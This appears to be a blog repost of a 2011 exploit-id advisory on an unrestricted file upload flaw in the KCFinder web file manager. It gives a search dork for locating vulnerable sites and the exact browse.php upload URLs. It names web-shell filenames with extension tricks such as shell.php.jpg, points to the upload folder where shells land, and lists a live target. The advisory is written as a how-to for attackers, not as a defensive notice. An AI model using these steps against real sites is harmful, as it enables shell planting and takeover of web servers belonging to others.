This is an example of a HTML caption with a link.



14 Jun 2011

CKSource KCFinder <= File Upload Vulnerability

Labels: 
=====================================================================
                      .__         .__  __            .__    .___
  ____ ___  _________ |  |   ____ |__|/  |_          |__| __| _/
_/ __ \\  \/  /\____ \|  |  /  _ \|  \   __\  ______ |  |/ __ |
\  ___/ >    < |  |_> >  |_(  <_> )  ||  |   /_____/ |  / /_/ |
 \___  >__/\_ \|   __/|____/\____/|__||__|           |__\____ |
     \/      \/|__|                                          \/
   Exploit-ID is the Exploit Information Disclosure
 
Web             : exploit-id.com
e-mail          : root[at]exploit-id[dot]com             
 
                  #########################################
               I'm Z190T, member of Exploit-Id
      #########################################
======================================================================
 
[x] Title : "CKSource KCFinder <= File Upload Vulnerability"
[x] Author : Z190T
[x] Contact : mahruz.id[at]gmail[at]com
[x] Vendor : http://kcfinder.sunhater.com/
[x] Platform : PHP and asp
[x] dork : /kcfinder/browse.php
[x] Tested on : Windows XP sp3 Ar & Linux
 
**** Notice ****
KCFinder is an alternative to the CKFinder web file manager.
It can be integrated into FCKeditor, CKEditor, and TinyMCE WYSIWYG web editors
to upload and manage img,Flash, and other files that can be embedded in an editor's generated HTML content.
 
**** Exploit Details ****
- http://[localhost]/kcfinder/browse.php
- http://[localhost]/[ketahuan]/kcfinder/browse.php
 
**** Attachtement ****
- http://[localhost]/kcfinder/browse.php?type=files&dir=/ <== for anything Files
- http://[localhost]/kcfinder/browse.php?type=images&dir=/ <== for anything Images
- Shell Example : shell.php, shell.asp, shell.html, shell.php.jpg, shell.asp.jpg, or,, [txt] extentions!!
 
**** Preview ****
- You can see there!! "0r"
- http://[localhost]/[ketahuan]/kcfinder/upload/files/[g0 a HACK]
 
**** Live Demo ****
- http://[lagi-nyari]/js/kcfinder/browse.php
 
======================================================================
 
[ Thx TO ]
 
[x] All member of EXPLOIT-ID.com, ungu.com, THK-forumo.org, etc...
[x] temen yang saya banggakan : haX0r.x0x, Surabaya Getar, kaMtiEz, eXeSoul, Caddy-Dz, KedAns-Dz, metasploit, KnocKout, etc...
 
======================================================================
Posted by |

Friends Blog
Sponsors : Best Google Covers | Desktop Wallpaperslk | PSD Graphics
Copyright © 2012. bedegar - All Rights Reserved
Template Design by Cool Blogger Tutorials | Published by Templates Doctor
Powered by Blogger